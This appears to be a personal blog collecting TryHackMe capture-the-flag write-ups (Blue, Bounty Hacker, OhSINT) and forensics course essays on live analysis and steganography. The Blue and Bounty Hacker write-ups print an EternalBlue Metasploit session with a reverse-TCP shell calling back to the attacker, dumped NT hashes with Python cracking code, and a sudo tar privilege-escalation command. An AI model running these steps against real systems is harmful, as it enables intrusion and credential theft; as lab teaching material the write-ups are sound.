Blue

Armand Alvarez | Friday, 05 November 2021


Since I use tmux with multiple sessions, I set the tmux environment variable $IP to the IP address given to me by THM. Panes and windows opened after this inherit the variable; a shell that was already open will not see it until you re-export it there.

 └─$ tmux setenv IP 10.10.91.32

Nmap

# Nmap 7.91 scan initiated Fri Nov  5 22:39:26 2021 as: nmap -sCV -v -oN initial 10.10.91.32
Increasing send delay for 10.10.91.32 from 0 to 5 due to 255 out of 848 dropped probes since last increase.
Nmap scan report for 10.10.91.32
Host is up (0.11s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ms-wbt-server Microsoft Terminal Service
| rdp-ntlm-info: 
|   Target_Name: JON-PC
|   NetBIOS_Domain_Name: JON-PC
|   NetBIOS_Computer_Name: JON-PC
|   DNS_Domain_Name: Jon-PC
|   DNS_Computer_Name: Jon-PC
|   Product_Version: 6.1.7601
|_  System_Time: 2021-11-06T02:40:39+00:00
| ssl-cert: Subject: commonName=Jon-PC
| Issuer: commonName=Jon-PC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2021-11-05T02:12:25
| Not valid after:  2022-05-07T02:12:25
| MD5:   860d 0816 ffbb 1bde 790e f320 9a87 3abb
|_SHA-1: b33b 9c4e b514 c812 32b1 324c 397d 10e6 6c9b 3ad8
|_ssl-date: 2021-11-06T02:40:44+00:00; +1s from scanner time.
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49158/tcp open  msrpc         Microsoft Windows RPC
49159/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h00m00s, deviation: 2h14m09s, median: 0s
| nbstat: NetBIOS name: JON-PC, NetBIOS user: , NetBIOS MAC: 02:fd:9f:77:75:ad (unknown)
| Names:
|   JON-PC<00>           Flags: 
|   WORKGROUP<00>        Flags: 
|   JON-PC<20>           Flags: 
|   WORKGROUP<1e>        Flags: 
|   WORKGROUP<1d>        Flags: 
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: 
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-11-05T21:40:38-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-11-06T02:40:38
|_  start_date: 2021-11-06T02:12:24

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov  5 22:40:43 2021 -- 1 IP address (1 host up) scanned in 77.09 seconds

We can see from this that the machine has SMB running on Windows 7 Professional SP1 (build 7601). The SMBv1 server in this OS is vulnerable to EternalBlue, CVE-2017-0144, which Microsoft patched in security bulletin MS17-010. The version banner alone does not prove the host is unpatched; the nmap script `smb-vuln-ms17-010` or the Metasploit scanner `auxiliary/scanner/smb/smb_ms17_010` will check that safely. Note also that the scan reports SMB message signing as disabled, which nmap itself flags as dangerous.

Metasploit

msf6 > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

Launch Metasploit on Linux with `msfconsole`. Searching for either the bulletin number (ms17-010) or the CVE number (2017-0144) gives similar results.
The module we want is exploit/windows/smb/ms17_010_eternalblue. Before running it, entry 3 above (auxiliary/scanner/smb/smb_ms17_010) confirms that the host is actually unpatched without risking a crash.

Options

msf6 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework
                                             /wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects
                                             Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target
                                             machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Wind
                                             ows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target mach
                                             ines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server
                                              2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.240    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

The options show a few required settings. The only required one not yet set is RHOSTS, the target host.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.91.32
rhosts => 10.10.91.32

Set the payload to a reverse TCP shell. This is a plain command shell rather than the default Meterpreter payload shown above, which is why the session has to be upgraded later.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcp

If you are connected over OpenVPN (THM usually requires it), set LHOST to your tun0 address rather than the default; otherwise the reverse shell calls back to an address the target cannot reach. `ip addr show tun0` or `ifconfig tun0` shows it.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.6.77.21
LHOST => 10.6.77.21

It took a few runs of the exploit, but I finally got in. That is normal for this module: EternalBlue is a kernel pool corruption exploit (hence its "average" rank), it depends on grooming the target's kernel memory, and a failed attempt can blue-screen the host. On a real engagement, prefer ms17_010_psexec where it applies; it is far less likely to crash the target.

Upgrading from normal shell to meterpreter shell

I followed an online writeup to convert the shell.

First, background the current (Normal Shell) session.

C:\Windows\system32>^Z
Background session 1? [y/N]  y
msf6 exploit(windows/smb/ms17_010_eternalblue) > 

Select the shell_to_meterpreter module

msf6 exploit(windows/smb/ms17_010_eternalblue) > search shell_to_meterpreter

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  post/multi/manage/shell_to_meterpreter                   normal  No     Shell to Meterpreter Upgrade

Interact with a module by name or index. For example info 0, use 0 or use post/multi/manage/shell_to_meterpreter

msf6 exploit(windows/smb/ms17_010_eternalblue) > use 0
msf6 post(multi/manage/shell_to_meterpreter) > 

The options show that SESSION is the only required setting without a default.

msf6 post(multi/manage/shell_to_meterpreter) > options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will try to au
                                       to detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on.

List the sessions, set SESSION to 1 (either of the two shell sessions will do), and `run`.

msf6 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type               Information  Connection
  --  ----  ----               -----------  ----------
  1         shell x64/windows               10.6.77.21:4444 -> 10.10.91.32:49233 (10.10.91.32)
  2         shell x64/windows               10.6.77.21:4444 -> 10.10.91.32:49234 (10.10.91.32)

msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1

After `run`, the module starts a handler on LPORT 4433, pushes a Meterpreter stager through the shell session, and a new Meterpreter session appears. We can now list and open it.

msf6 post(multi/manage/shell_to_meterpreter) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  1         shell x64/windows                                      10.6.77.21:4444 -> 10.10.91.32:49233 (10.10.91.3
                                                                   2)
  2         shell x64/windows                                      10.6.77.21:4444 -> 10.10.91.32:49234 (10.10.91.3
                                                                   2)
  3         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ JON-PC  10.6.77.21:4433 -> 10.10.91.32:49246 (10.10.91.3
                                                                   2)

msf6 post(multi/manage/shell_to_meterpreter) > session -i 3
[-] Unknown command: session
msf6 post(multi/manage/shell_to_meterpreter) > session -i 3
[-] Unknown command: session
msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > 

Meterpreter

After I got the upgraded shell, I ran `shell` to open a Windows command prompt, then `whoami` to verify I was indeed NT AUTHORITY\SYSTEM. Then I ran `ps` to list the running processes and `migrate` into a process running as NT AUTHORITY\SYSTEM. Note that the upgraded session is an x86 Meterpreter on a 64-bit host (see the session list above); migrating into a 64-bit SYSTEM process also gives you a native x64 Meterpreter, which avoids WOW64 quirks in later post-exploitation modules.

Cracking the password

Dump the local account hashes. This works because the session is running as SYSTEM; the SAM hive is not readable otherwise.

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

I copied this hash into a file and used hashcat to crack it, following an online article. Two points about the command below: `-m 1000` is hashcat's NTLM mode, i.e. the NT hash, which is the fourth colon-separated field of each hashdump line; and `--show` only prints results already in hashcat's potfile, so the actual cracking run is the same command without `--show`. Reading the dump itself: the LM field `aad3b435b51404eeaad3b435b51404ee` is the hash of an empty LM password, meaning LM hashes are not stored on this host, and `31d6cfe0d16ae931b73c59d7e0c089c0` for Administrator and Guest is the NT hash of an empty password, so those accounts have no password set. Cracking is also optional for SMB: the NT hash itself is the credential, and pass-the-hash (Metasploit's exploit/windows/smb/psexec accepts the LM:NT pair as SMBPass) works without it.

└─$ hashcat -m 1000 --show hash /usr/share/wordlists/rockyou.txt
ffb43f0de35be4d9917ac0cc8ad57f8d:alqfna22
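As an added example (not part of the original writeup), here is what `hashcat -m 1000` is doing with the hashdump lines above, done by hand. An NT hash is MD4 over the UTF-16LE encoding of the password. OpenSSL 3 ships MD4 only as a "legacy" algorithm, so `hashlib.new("md4")` often fails on current systems; a small pure-Python MD4 (RFC 1320) is included instead. The hashdump text is the one from this page; the wordlist is a constructed stand-in for rockyou.txt.

```python
"""NT hash computation, hashdump parsing and a dictionary attack.
Added example; not code from the original writeup or from hashcat."""
import struct


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 digest (pure Python, for clarity not speed)."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), list(range(16)), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        s = state[:]
        for f, order, shifts, k in rounds:
            for i in range(16):
                t = (-i) % 4                          # register updated this step: a, d, c, b, ...
                v = (s[t] + f(s[(t + 1) % 4], s[(t + 2) % 4], s[(t + 3) % 4])
                     + X[order[i]] + k) & 0xFFFFFFFF
                s[t] = _rotl(v, shifts[i % 4])
        state = [(a + b) & 0xFFFFFFFF for a, b in zip(state, s)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), hex encoded as hashdump prints it."""
    return md4(password.encode("utf-16-le")).hex()


EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"    # LM hash of "" -> LM storage disabled


def parse_hashdump(dump: str) -> list:
    """Parse user:rid:lm:nt::: lines and annotate the two things worth noticing."""
    rows = []
    for line in dump.strip().splitlines():
        user, rid, lm, nt = line.split(":")[:4]
        rows.append({
            "user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower(),
            "lm_disabled": lm.lower() == EMPTY_LM,
            "empty_password": nt.lower() == nt_hash(""),
        })
    return rows


def crack_nt(nt_hex: str, wordlist) -> str:
    """Dictionary attack: exactly what hashcat -m 1000 does, minus the GPU."""
    target = nt_hex.lower()
    for word in wordlist:
        if nt_hash(word) == target:
            return word
    return None


# The hashdump output from this page.
HASHDUMP = """Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::"""

# Constructed stand-in for rockyou.txt.
WORDLIST = ["password", "123456", "letmein", "alqfna22", "Password1"]

if __name__ == "__main__":
    for row in parse_hashdump(HASHDUMP):
        cracked = "<empty>" if row["empty_password"] else crack_nt(row["nt"], WORDLIST)
        print(f"{row['user']:14} LM stored: {not row['lm_disabled']}  password: {cracked}")
```

The per-candidate cost here is one MD4 over a few bytes, which is why NT hashes fall to wordlists so quickly and why a password policy, not hash secrecy, is the real control.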

Finding the Flags

The first flag can be found at the root of the machine.

meterpreter > ls
Listing: C:\
============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40777/rwxrwxrwx   0      dir   2009-07-13 23:18:56 -0400  $Recycle.Bin
40777/rwxrwxrwx   0      dir   2009-07-14 01:08:56 -0400  Documents and Settings
40777/rwxrwxrwx   0      dir   2009-07-13 23:20:08 -0400  PerfLogs
40555/r-xr-xr-x   4096   dir   2009-07-13 23:20:08 -0400  Program Files
40555/r-xr-xr-x   4096   dir   2009-07-13 23:20:08 -0400  Program Files (x86)
40777/rwxrwxrwx   4096   dir   2009-07-13 23:20:08 -0400  ProgramData
40777/rwxrwxrwx   0      dir   2018-12-12 22:13:22 -0500  Recovery
40777/rwxrwxrwx   4096   dir   2018-12-12 18:01:17 -0500  System Volume Information
40555/r-xr-xr-x   4096   dir   2009-07-13 23:20:08 -0400  Users
40777/rwxrwxrwx   16384  dir   2009-07-13 23:20:08 -0400  Windows
100666/rw-rw-rw-  24     fil   2018-12-12 22:47:39 -0500  flag1.txt
0000/---------    0      fif   1969-12-31 19:00:00 -0500  hiberfil.sys
0000/---------    0      fif   1969-12-31 19:00:00 -0500  pagefile.sys

meterpreter > cat flag1.txt
flag{access_the_machine}meterpreter > 

The second flag is in C:\Windows\System32\config. This directory holds the registry hives, including the SAM hive, where local account password hashes (the ones hashdump read) are stored.

I was having trouble finding the final flag, but Meterpreter's `search -f flag*` looks for any file whose name begins with "flag" (add `-d C:\\` to limit it to one drive). This showed me the location of the final flag: it is in Jon's Documents folder.


That's all! Happy hacking 🙂

Bounty Hacker

TO SEE THE FULL WRITE-UP WITH IMAGES INCLUDED, PLEASE VISIT THE GITHUB LINK BELOW. Thank you.

Armand Alvarez | 16 August 2021

github.com/Armand-Alvarez

Room Link on TryHackMe


Find open ports on the machine

nmap

We can see we have the following ports open:

  • 21 - ftp

  • 22 - ssh

  • 80 - http


Who wrote the task list?

FTP

We can see from our nmap scan that FTP allows anonymous login, so let's explore that first.

ftp

After logging in, we start in the FTP root directory, which holds nothing but two files. We can download them to our local machine with `get` inside the ftp client, or with wget using an ftp:// URL, which also works for anonymous FTP.

task.txt

Reading the file on our local machine shows that lin wrote it.


What service can you bruteforce with the text file found?

The other file we found is called locks.txt:

locks.txt

It looks like a file of possible passwords. We can try using this later.

Let's check out the website.

website homepage

The homepage has nothing important in it, and the page source doesn't contain anything hidden either.

Gobuster revealed a /images directory that only stores the picture we see on the home page. Nothing important there.

Nikto revealed a few things, but nothing relevant right now:

nikto

Given that the website has led to a dead end for now, the only other service we can use the password file on is SSH.


What is the users password?

Hint: Hydra may be able to help.

Let's use Hydra to figure out which password works with SSH. We can guess that lin is the username, since that is the only name we have found so far.

hydra

We see our successful password is RedDr4gonSynd1cat3.

Testing it on SSH works.

ssh_lin


user.txt

Once we get into the IP via SSH, we can cat the file.

user.txt

The flag for the user is: THM{CR1M3_SyNd1C4T3}


root.txt

Running sudo -l as lin gives us the following:

sudo -l

We can see that lin may run /bin/tar as root. This is great!

Going to GTFOBins, searching for "tar" and clicking Sudo (because we have sudo privileges for tar), we are given the following command:

tar sudo

Running this command in the SSH session gives us root privileges. We can then read root.txt to find the flag: THM{80UN7Y_h4cK3r}

root
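As an added example (not part of the original writeup), here is why a sudo rule for tar is the same as a root shell. GNU tar's `--checkpoint-action=exec=CMD` hands CMD to `/bin/sh -c` every `--checkpoint=N` records it writes, so whoever can run tar can run any command as tar's user; the GTFOBins sudo entry for tar is exactly that, with `/bin/sh` as the command: `sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh`. The demo below runs the same trick without sudo and with a harmless payload, so you can see tar execute something that is not tar. It assumes GNU tar is installed (busybox tar has no `--checkpoint`).

```python
"""Demonstrate that GNU tar's checkpoint action executes arbitrary commands.
Added example; not code from the original writeup or from GTFOBins."""
import subprocess

MARKER = "TAR_CHECKPOINT_PAYLOAD_RAN"   # constructed marker string


def tar_checkpoint_exec(payload: str) -> subprocess.CompletedProcess:
    """Archive /dev/null to /dev/null (nothing touches disk) while asking tar to
    run `payload` at its first checkpoint. The payload inherits tar's stdout."""
    cmd = ["tar", "-cf", "/dev/null", "/dev/null",
           "--checkpoint=1", f"--checkpoint-action=exec={payload}"]
    return subprocess.run(cmd, capture_output=True, text=True, timeout=30)


def payload_ran() -> bool:
    """True when the echo we smuggled through tar shows up in tar's output."""
    proc = tar_checkpoint_exec(f"echo {MARKER}")
    return MARKER in proc.stdout


def privesc_command(payload: str = "/bin/sh") -> list:
    """The same argv with sudo in front: what `sudo -l` granting /bin/tar means.
    Built for display only; this function never executes it."""
    return ["sudo", "tar", "-cf", "/dev/null", "/dev/null",
            "--checkpoint=1", f"--checkpoint-action=exec={payload}"]


if __name__ == "__main__":
    print("tar executed our payload:", payload_ran())
    print("equivalent privesc:", " ".join(privesc_command()))
```

The defensive reading is the one that matters: a sudoers entry for any program that can spawn subprocesses, read and write arbitrary files, or load code (tar, vim, find, python, and the rest of the GTFOBins list) is effectively `ALL`, so NOPASSWD rules should point at a fixed wrapper script with no user-controlled arguments, not at the binary.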


That's all! Happy hacking.

🙂

Live Analysis

This essay was written for Professor Leinecker's Digital Forensics I course.


Live analysis, or a live response, is when you observe the volatile memory of a system. This kind of memory can be RAM or cache memory, for example. A problem with live analysis is volatility. Much of this information is what is called “volatile”, meaning it will be deleted or altered if the device loses power. So why do live analysis then? Sometimes it is the only option. If you have a warrant that limits you to live response, or if you need to capture that volatile memory to observe internet activity, for example, this would restrict you to only performing a live response. Of course, if you already have (or have seized) a device, you can pull a full image from it and do analysis, but you won’t be able to view much of this volatile memory because it will be gone if the device is powered off. Imaging a hard drive is great for analysis, but it won’t contain any of the vital volatile memory that may be needed to gain evidence for a conviction of wrongdoing. 

What kind of information might be found before a computer is shut down? Anything from user data to running applications and programs; basically, the temporary working memory of the computer. Web cache and browsing information may be held in volatile memory too, revealing somebody's web activity. Session cookies are an example: they live only in the browser's memory and are discarded when the browser is closed (persistent cookies, by contrast, are written to disk). Programs will sometimes hold passwords, or their hashes, in memory. If you can pull the strings out of RAM, you may be able to crack the hashes and recover the cleartext passwords.

The risks of doing live response can be great, depending on the system, the time you have, and the tools you use. If you are performing live analysis on a production server, for example, you have to be very careful not to crash it. Some tools consume too many resources or do not work well with the server's configuration and cause a hard crash. This is bad, because crashing a production system may give the company grounds to hold you liable for losses incurred during the outage, and for a big company those losses may be great. Some tools also do not perform a pure live acquisition: they alter parts of memory in the process of collection (at a minimum, the acquisition tool itself occupies memory while it runs). Evidence altered in an undocumented way loses integrity and is often inadmissible in court, or even in private investigations, so the tool used and its known footprint must be recorded. Another consideration is data availability and integrity prior to collection. Some people set up traps that automatically shut down the computer if live analysis is detected. Many people also encrypt their drives and shut the computer down whenever they are not using it; because the non-volatile storage is encrypted, the data is unreadable as long as the machine is powered off.

Wireshark is an example of a live analysis tool: it captures network traffic between a machine and other endpoints while the system is running, evidence that exists only in transit. Magnet RAM Capture is a tool that does what its name implies: it captures the contents of volatile RAM. Belkasoft's RAM Capturer does the same.

Data Hiding

This essay was originally written 25 Sept 2021 for Professor Leinecker's Digital Forensics I course.


Data hiding, or steganography, is the practice of hiding data within other data. The data that is hidden is called the payload. This can be text, images, videos, any data. The data that it is hidden in is called the carrier. Again, this can be any type of data. Oftentimes, data is hidden within slack space or free space. It can also be hidden by replacing carrier data values with payload data values.

Data hiding has been practiced for centuries. A long time ago, data hiding would be done with invisible ink, or using wax to cover stones with engravings in them that read out a secret message. In the present age, data hiding is done electronically. You can deconstruct any file you want to hide into bits, shove those bits somewhere they won’t be seen, and then reconstruct the file at a later time. This technique is so incredible because it is invisible to the human eye. Looking at an image file or listening to an audio file that has data hidden in it will usually not be detectable unless forensically analyzed. 

To find a file hidden inside another file, begin by looking for the file signature, or header: a fixed sequence of bytes that every file of that type starts with. For a JPEG it is FF D8 FF (three bytes, six hex digits); a JFIF-format JPEG continues with E0 and the ASCII string JFIF. Make the header the start of your block and end it at the file trailer (the last bytes of every file of that type; for JPEG, FF D9). Extract those bytes to their own file and you have the hidden file. The caveat is that a trailer sequence can also occur inside ordinary data, so a carve that stops at the first trailer may be truncated, and a carve that starts at a false header match will not open.

Finding hidden text can be harder because of encryption. If human-readable text is hidden inside a file, you can find it easily by extracting runs of consecutive printable characters, because most bytes in a binary file are not printable ASCII. For example, you may have a run of bytes that renders as: “ÀYŒ€c¸+k·£‘»zzŠñït”. But a run that reads “This is a code” was almost certainly inserted on purpose. If the inserted text is encrypted, so that it mixes readable and non-readable bytes, it is very difficult to distinguish from the original file's data.
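As an added example (not part of the original essay), here are the two checks just described, signature carving and printable-string extraction, written without any forensic tool. The carrier is constructed inline: non-printable filler, a minimal fake JPEG (only the signature, a JFIF marker and the trailer matter for carving), more filler, and one planted readable string; nothing in it is a real image.

```python
"""Naive JPEG carving and strings(1)-style extraction over a byte blob.
Added example; not code from the original essay."""
import re

JPEG_HEADER = b"\xFF\xD8\xFF"    # file signature: every JPEG starts with these three bytes
JPEG_TRAILER = b"\xFF\xD9"       # EOI marker: the last two bytes of a JPEG


def carve_jpegs(blob: bytes, max_size: int = 10 * 1024 * 1024) -> list:
    """Return (offset, data) for each header..trailer span found in blob.
    Deliberately naive, like a first-pass carver: it stops at the first FF D9
    after a header, so a JPEG with an embedded thumbnail (which carries its own
    FF D9) would be truncated; a real carver walks the marker segments."""
    found = []
    pos = 0
    while True:
        start = blob.find(JPEG_HEADER, pos)
        if start < 0:
            break
        end = blob.find(JPEG_TRAILER, start + len(JPEG_HEADER))
        if end < 0:
            break
        end += len(JPEG_TRAILER)
        if end - start <= max_size:
            found.append((start, blob[start:end]))
        pos = end
    return found


def strings(blob: bytes, min_len: int = 4) -> list:
    """Runs of printable ASCII at least min_len long, like the strings(1) tool."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


# Constructed carrier. The filler has no FF bytes and no printable bytes, so
# everything the two functions report was planted on purpose.
_FILLER = bytes([0x00, 0x80, 0x01, 0xFE]) * 25                       # 100 bytes
_FAKE_JPEG = JPEG_HEADER + b"\xE0\x00\x10JFIF\x00" + bytes(64) + JPEG_TRAILER
CARRIER = _FILLER + _FAKE_JPEG + _FILLER + b"This is a code" + _FILLER[:50]


def analyse(blob: bytes) -> dict:
    """Summary an examiner would look at first: where the images are, what text is visible."""
    return {
        "jpegs": [(off, len(data)) for off, data in carve_jpegs(blob)],
        "strings": strings(blob),
    }


if __name__ == "__main__":
    report = analyse(CARRIER)
    for off, size in report["jpegs"]:
        print(f"JPEG at offset {off}, {size} bytes")
    for s in report["strings"]:
        print("string:", s)
```

Even on this toy input `strings` reports "JFIF" as well as the planted message: real files are full of short printable runs, which is why a longer minimum length, or a keyword list, is usually the next step.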

One example of replacing carrier values with payload values is hiding data in an image's color values. An image's pixels are stored as bytes giving their RGB values. The least significant bit of each byte makes no noticeable difference to the color or quality of the image: flipping it changes a channel by one step out of 255, less than half a percent, and the human eye cannot perceive a difference that small. To hide data, you work with two bit streams: the bits of the data you wish to hide, the payload bits, and the least significant bits of the image's RGB values, the carrier bits. You simply overwrite the carrier bits with the payload bits. Afterwards the image looks no different, but your data is inside it. To read it back, you walk the RGB bytes in the same order, take each least significant bit and append it to the previous one; when you are done, the payload bit stream is exactly as it was. The one drawback is that the carrier cannot be restored to its original form unless you saved the bits that were replaced.
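As an added example (not part of the original essay), here is least-significant-bit embedding and extraction over a raw RGB byte buffer. No image library is used; the "image" is a constructed bytes object of R,G,B samples, which is what a decoded bitmap is in memory. A 32-bit length header is embedded ahead of the payload so the extractor knows where to stop, and the extractor refuses buffers whose header cannot be right, which is what happens when you run it on an image that carries nothing.

```python
"""LSB steganography on an RGB sample buffer, embed and extract.
Added example; not code from the original essay."""
import struct


def _bits(data: bytes):
    """Yield the bits of data, most significant bit of each byte first."""
    for byte in data:
        for i in range(7, -1, -1):
            yield (byte >> i) & 1


def lsb_embed(carrier: bytes, payload: bytes) -> bytes:
    """Overwrite the LSB of successive carrier samples with the payload bits,
    preceded by a 4-byte big-endian length so the reader knows the payload size."""
    framed = struct.pack(">I", len(payload)) + payload
    if len(framed) * 8 > len(carrier):
        raise ValueError("carrier too small: need %d samples, have %d"
                         % (len(framed) * 8, len(carrier)))
    out = bytearray(carrier)
    for idx, bit in enumerate(_bits(framed)):
        out[idx] = (out[idx] & 0xFE) | bit        # keep the top 7 bits, replace the LSB
    return bytes(out)


def lsb_extract(stego: bytes) -> bytes:
    """Read LSBs back in the same order; the first 32 bits give the payload length."""
    def read_bytes(count: int, bit_offset: int) -> bytes:
        vals = bytearray()
        for b in range(count):
            v = 0
            for i in range(8):
                v = (v << 1) | (stego[bit_offset + b * 8 + i] & 1)
            vals.append(v)
        return bytes(vals)

    if len(stego) < 32:
        raise ValueError("buffer too small to hold a length header")
    (length,) = struct.unpack(">I", read_bytes(4, 0))
    if 32 + length * 8 > len(stego):
        raise ValueError("length header does not fit: not an LSB carrier, or corrupted")
    return read_bytes(length, 32)


def max_abs_delta(a: bytes, b: bytes) -> int:
    """Largest per-sample change between two buffers; LSB embedding keeps this at 1."""
    return max(abs(x - y) for x, y in zip(a, b))


def build_rgb_buffer(width: int = 32, height: int = 32) -> bytes:
    """Constructed 'image': a smooth gradient so the samples look like real pixel data."""
    return bytes((x * 7 + y * 3 + c * 50) % 256
                 for y in range(height) for x in range(width) for c in range(3))


if __name__ == "__main__":
    cover = build_rgb_buffer()
    stego = lsb_embed(cover, b"This is a code")
    print("recovered:", lsb_extract(stego))
    print("largest sample change:", max_abs_delta(cover, stego))
```

The essay's point about the carrier holds in code: `lsb_embed` returns a new buffer and keeps no record of the bits it overwrote, so the original cannot be reconstructed from the stego image alone. Detection works from the other side of the same fact: a sequential LSB scheme like this one leaves a length field and then ASCII in the first few hundred LSBs, which is exactly what statistical steganalysis and a plain LSB-plane dump look for.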

Another method of data hiding uses slack space. Slack space exists when only part of a cluster is used by a file; the rest is unused, and you can put whatever data you wish there, which makes it a convenient carrier. The caveat is that if the space is overwritten through normal use of the file system, you lose your payload bits. The method therefore works best on media that are not in active use (archive or backup file systems, for example).

OhSINT

TO VIEW THIS WRITE-UP WITH ALL IMAGES INCLUDED, PLEASE VISIT THE GITHUB LINK BELOW. Thank you.

Armand Alvarez | 17 July 2021

Room link

Github Link


Task 1: OhSINT

First download the task file.

Inspecting the base image

Using the eog <image.png> command to view the image we just downloaded, all we see is the old WindowsXP background image.

original image

On its own, this is nothing important, but what if we could dig deeper into the image.

What is this users avatar of?

The very first question asks what this user's avatar is of. Looking at the photo we downloaded, I have no idea. Let's use a tool called ExifTool to look at the metadata.

According to the man page, "ExifTool is a command-line interface..., used for reading and writing meta information in a variety of file types." In other words, it is a metadata tool: it reads and writes EXIF, XMP, PNG text chunks and similar fields. It is not a steganography tool, but metadata is where a lot of OSINT starts.

Using it, we can see the image's metadata and find who holds the copyright.

exiftool


Searching for OSINT

We see an OWoodflint as the copyright holder for the image we downloaded. Lets look this up on google.

